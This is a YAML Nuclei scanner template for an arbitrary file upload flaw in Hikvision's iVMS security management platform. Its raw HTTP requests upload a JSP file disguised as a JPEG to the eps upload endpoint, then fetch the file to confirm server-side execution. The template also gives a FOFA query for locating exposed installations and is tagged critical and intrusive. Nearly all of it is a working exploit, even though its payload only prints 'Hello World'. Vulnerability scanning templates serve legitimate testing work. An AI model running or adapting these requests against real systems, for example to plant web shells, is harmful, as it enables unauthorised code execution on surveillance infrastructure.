http:
    - extractors:
        - internal: true
          json:
            - .data|.resourceUuid
          name: name1
          part: body
          type: json
      matchers:
        - condition: and
          dsl:
            - status_code_2==200
            - contains(body_2, 'Hello World')
          type: dsl
      raw:
        - |
          POST /eps/resourceOperations/upload.action HTTP/1.1
          Host: {{Hostname}}
          Cache-Control: max-age=0
          Upgrade-Insecure-http: 1
          User-Agent: MicroMessenger
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9
          Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710
          Connection: close
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
          Content-Length: 218

          ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
          Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
          Content-Type: image/jpeg

          <%out.println("Hello World");%>
          ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
        - |
          GET /eps/upload/{{name1}}.jsp HTTP/1.1
          Host: {{Hostname}}
id: hikvision_iVMS_eps_upload
info:
    author: Xc1Ym
    description: 海康威视iVMS综合安防管理平台eps接口存在任意文件上传
    metadata:
        fofa-query: app="HIKVISION-iVMS"
        max-request: 1
        verified: true
    name: HiKVISION iVMS综合安防管理平台eps文件上传
    severity: critical
    tags:
        - upload
        - iot
        - hikvision
        - hw
        - intrusive
        - 海康威视ivms
        - HIKVISION-iVMS
        - Hikvision-iVMS
